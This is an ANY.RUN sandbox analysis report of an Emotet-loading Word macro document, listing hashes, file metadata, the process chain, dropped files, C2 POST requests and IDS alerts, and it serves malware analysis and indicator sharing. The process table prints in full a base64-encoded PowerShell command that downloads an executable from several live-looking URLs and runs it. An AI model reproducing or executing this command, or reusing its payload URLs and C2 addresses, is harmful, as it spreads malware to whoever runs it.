analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

9160f777f38f145d020d5384872be769

Full analysis: https://app.any.run/tasks/eed3ba00-c8b4-4206-8a4c-e3c28d552526
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 24, 2019, 07:48:43
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Haven generating exploit, Subject: schemas, Author: Josh Stroman, Comments: strategy, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 23 07:57:00 2019, Last Saved Time/Date: Thu May 23 07:57:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 89, Security: 0
MD5:

9160F777F38F145D020D5384872BE769

SHA1:

742CDD93E062CD76EEC6CF19CC8CAF69BC589F5C

SHA256:

FDB1E7E7FABC9985F4FDF49AA9CE9264034BCEF8DA36F2E804401AF4E561D19F

SSDEEP:

3072:BV77HUUUUUbxzhbBUUUUUUUUUUUUUTkOQewu5U8qTLM:BV77HUUUUUbxzhbBUUUUUUUUUUUUUT5b

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 905.exe (PID: 2572)
      • 905.exe (PID: 596)
      • soundser.exe (PID: 3608)
      • soundser.exe (PID: 2924)
    • Emotet process was detected

      • soundser.exe (PID: 2924)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2832)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2832)
    • PowerShell script executed

      • powershell.exe (PID: 2832)
    • Application launched itself

      • 905.exe (PID: 2572)
    • Creates files in the user directory

      • powershell.exe (PID: 2832)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2832)
      • 905.exe (PID: 596)
    • Connects to server without host name

      • soundser.exe (PID: 3608)
    • Starts itself from another location

      • 905.exe (PID: 596)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3196)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3196)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Haven generating exploit
Subject: schemas
Author: Josh Stroman
Keywords: -
Comments: strategy
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:23 06:57:00
ModifyDate: 2019:05:23 06:57:00
Pages: 1
Words: 15
Characters: 89
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Kassulke, Keebler and Medhurst
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 103
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Bogan
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 905.exe no specs 905.exe #EMOTET soundser.exe no specs soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
3196"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\9160f777f38f145d020d5384872be769.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2832powershell -nop -e JABtADgAbgAyAGkAWgBXAD0AJwB3ADkARQBDAEIAbgBQAEYAJwA7ACQAVwB3AG8ANQBkAHoAQgAgAD0AIAAnADkAMAA1ACcAOwAkAHoAagBJAFMAZgBfAHoAPQAnAFkAWQBVAG8AdwB6AEQAbwAnADsAJABPAGsAZABpAHUAZAA3ADUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFcAdwBvADUAZAB6AEIAKwAnAC4AZQB4AGUAJwA7ACQASABZADkARQA5ADgAYwBZAD0AJwBoAFgANABPADEAaQAnADsAJABHAFQAMABTAGsAbgBoAHEAPQAuACgAJwBuACcAKwAnAGUAJwArACcAdwAtAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAE4ARQBgAFQALgB3AGUAYABCAGMATABgAGkAZQBgAE4AdAA7ACQASABkAGkAQwBNAEMAPQAnAGgAdAB0AHAAOgAvAC8AYgBsAG8AZwAuAGwAYQB2AGkAYQBqAGUAcgBpAGEALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AYgBzAEEATgBrAFYAYgB0AC8AQABoAHQAdABwADoALwAvAHMAbwBwAHIAbwBmAGkAcwBzAGkAbwBuAGEAbAAuAGMAbwBtAC4AYgByAC8AbQBvAG8AZABsAGUALwBBAG0ATQB3AFMARwBFAEMAbgAvAEAAaAB0AHQAcAA6AC8ALwBiAHIAawBjAGEAawBpAHIAbwBnAGwAdQAuAGMAbwBtAC8AdwBwAC8AdwBsADMAegA4AGEAZgBfADMAdQByAGIAcABhAC0AMQAzADkANAA5AC8AQABoAHQAdABwADoALwAvAHQAcgBhAGkAbgBpAG4AZwBlAG4AdABlAHIAcAByAGkAcwBlAC4AYwBvAG0ALgBtAHgALwB3AHAALwB1AG4ANwBpAF8AaQBnAGYANQBqAC0AMAAwADUANQAwADQANgA5ADEALwBAAGgAdAB0AHAAOgAvAC8AbQBvAHQAaABlAHIAcwBoAGUAbABwAGUAcgBzAC4AbgBlAHQALwB3AHAALwBPAGEAUQB6AEYAVgBKAE4ALwAnAC4AcwBwAEwASQBUACgAJwBAACcAKQA7ACQAUgBWAGoAbABCAGkAWABoAD0AJwBOAE0AawBtAFYAXwBvACcAOwBmAG8AcgBlAGEAYwBoACgAJAB3ADIANwBMAFcANQBRACAAaQBuACAAJABIAGQAaQBDAE0AQwApAHsAdAByAHkAewAkAEcAVAAwAFMAawBuAGgAcQAuAGQAbwB3AE4AbABPAGEAZABGAEkAbABFACgAJAB3ADIANwBMAFcANQBRACwAIAAkAE8AawBkAGkAdQBkADcANQApADsAJABaAEsAVgBEAG0ARAA9ACcARQBqAEcAdwBTAG8AJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABPAGsAZABpAHUAZAA3ADUAKQAuAEwARQBuAGcAdABoACAALQBnAGUAIAAyADQAOAA2ADAAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAVABhAHIAdAAoACQATwBrAGQAaQB1AGQANwA1ACkAOwAkAFMAaQBXAGEAcgBhAFUAPQAnAGQAYgBEAEMANQBsACcAOwBiAHIAZQBhAGsAOwAkAGsAbwBfAFMAOQBoAHMAPQAnAEIAaABtADAAaQBWACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGoARwBxAG0AegB1AEIAQQA9ACcAdQBQAEQAbgBmAEEAMQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2572"C:\Users\admin\905.exe" C:\Users\admin\905.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
596--848a2d3cC:\Users\admin\905.exe
905.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2924"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
905.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3608--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 698
Read events
1 217
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
9

Dropped files

PID
Process
Filename
Type
3196WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRF6D0.tmp.cvr
MD5:
SHA256:
2832powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TLYAWGXAHBGH9XK494EZ.temp
MD5:
SHA256:
3196WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:17222E7BED955763CB75EBDA153E0074
SHA256:EAEB163582F92B56C14963150DA7DBEA34565552F3D187A793BE19BEB0978882
2832powershell.exeC:\Users\admin\905.exeexecutable
MD5:DD424B112F023D97C2CF437B75338E21
SHA256:90AD956E082F45F7DE26F3FF5BCEEE1A56BCFF73DD9A489472E9290ECAD0B320
2832powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3196WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ACBD13F7.wmfwmf
MD5:1C82C7D687A34BDB0A1DF37628906A50
SHA256:8BF9BCC774655EAE2BCBF40FE9BB03D2F2A99BE9731BE967B8EA3F1458934444
3196WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E75C47B.wmfwmf
MD5:A3A2A2AE48A2B5BE8AF031EF0EF64ADE
SHA256:2A38AE1B9D0B0648E55E5EB6FC2FF70F06FCBFD11195D32773744B637B0B6490
3196WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1846FC40.wmfwmf
MD5:EEB5D4C53DDC174157212FBFB269E68E
SHA256:D033E61CE2A2504F918B8184C5AC94F6A6B860D855C34487A16543C84F608AAE
3196WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\265C4F41.wmfwmf
MD5:273B7D68E55760BA1396E3B12E37FB55
SHA256:A132ACBADFD581E2497678B1BE931A7AC1BC68A34DB618BEDD3AEC899AE810B5
3196WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\779CEC4E.wmfwmf
MD5:10892A98072F6370C0D5FA95357E85E4
SHA256:45E56F9E07F9D702DC254E60FBBF03343E389BE88205463F0757757A2CA4CA7B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3608
soundser.exe
POST
144.139.247.220:80
http://144.139.247.220/devices/free/ringin/merge/
AU
malicious
3608
soundser.exe
POST
76.86.20.103:80
http://76.86.20.103/tpt/forced/ringin/merge/
US
malicious
3608
soundser.exe
POST
5.67.205.99:80
http://5.67.205.99/ban/loadan/ringin/merge/
GB
malicious
2832
powershell.exe
GET
200
200.27.156.160:80
http://blog.laviajeria.com/wp-content/uploads/bsANkVbt/
CL
executable
74.0 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3608
soundser.exe
144.139.247.220:80
Telstra Pty Ltd
AU
malicious
3608
soundser.exe
76.86.20.103:80
Time Warner Cable Internet LLC
US
malicious
3608
soundser.exe
5.67.205.99:80
Sky UK Limited
GB
malicious
2832
powershell.exe
200.27.156.160:80
blog.laviajeria.com
Turismo Cocha S.A
CL
suspicious

DNS requests

Domain
IP
Reputation
blog.laviajeria.com
  • 200.27.156.160
  • 200.27.156.230
suspicious

Threats

PID
Process
Class
Message
2832
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2832
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2832
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info